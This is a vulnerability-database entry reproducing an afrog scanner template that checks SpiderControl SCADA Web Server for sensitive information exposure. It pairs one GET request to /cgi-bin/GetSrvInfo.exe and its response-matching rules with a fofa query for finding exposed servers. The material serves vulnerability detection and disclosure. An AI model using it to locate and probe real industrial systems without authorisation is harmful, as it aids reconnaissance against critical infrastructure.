spidercontrol-scada-server-info: SpiderControl SCADA Web Server - Sensitive Information Exposure

日期: 2025-09-01 | 影响软件: SpiderControl SCADA Web Server | POC: 已公开

漏洞描述

SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl. fofa: "SpiderControl"

PoC代码[已公开]

id: spidercontrol-scada-server-info

info:
  name: SpiderControl SCADA Web Server - Sensitive Information Exposure
  author: geeknik
  severity: high
  verified: true
  description: |-
    SpiderControl SCADA Web Server is vulnerable to sensitive information exposure. Numerous, market-leading OEM manufacturers - from a wide variety of industries - rely on SpiderControl.
    fofa: "SpiderControl"
  reference:
    - https://spidercontrol.net/spidercontrol-inside/
  tags: spidercontrol,scada,exposure,misconfig
  created: 2024/03/18

rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/GetSrvInfo.exe
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'powered by SpiderControl') &&
      response.body.bcontains(b'LSWEBSERVER') &&
      response.body.bcontains(b'SCWEBSERVICES')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/spidercontrol-scada-server-info.yaml